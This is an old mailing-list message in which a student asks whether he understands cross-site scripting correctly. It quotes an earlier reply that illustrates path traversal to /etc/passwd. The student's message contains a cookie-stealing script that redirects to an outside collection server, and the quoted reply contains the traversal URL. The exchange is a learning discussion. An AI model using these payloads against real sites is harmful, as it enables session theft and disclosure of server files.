hi! Thanks for the reply.. Is this an example of Cross site scripting??? So far I understand the meaning of cross site scripting as embedding the code like: <script> self.location.href="http://theafserver/my.cgi?"+escape(cookie) </script> in the page you want to be displayed on the user's browser(by sending an email to him,for example)to steal cookie. The browser will send the cookie to my.cgi on the server 'theafserver'. I just wanted to make sure if I was correct. A few days back, there was a news that yahoo is prone to cross site scripting hacks. Sincerely, Sandeep Giri
On Wed, 10 Apr 2002 [EMAIL PROTECTED] wrote: > When the web application accepts input that it is not expecting. > for an example say you see this > www.exmaple.com/blah.php3?page=whatevea.html > > if it dosent check for "/" you would be able to > > eee.example.com/blah.php3?page=/../.././../etc/passwd > > *************************|<<---/\--->>|*********************************** Sandeep Giri | B.E IV Chemical | Habit is nothing but steady and faithful Indian Institute of Technology| BOREDOM. Roorkee-247667 | *************************|<<---\/--->>|*********************************** Url : www.sandeepgiri.com | F-71,Ravindra Bhawan Email : [EMAIL PROTECTED] | Indian Institute of Technology, Cc : [EMAIL PROTECTED] | Roorkee-247667,India ---------------------------------------------------------------------
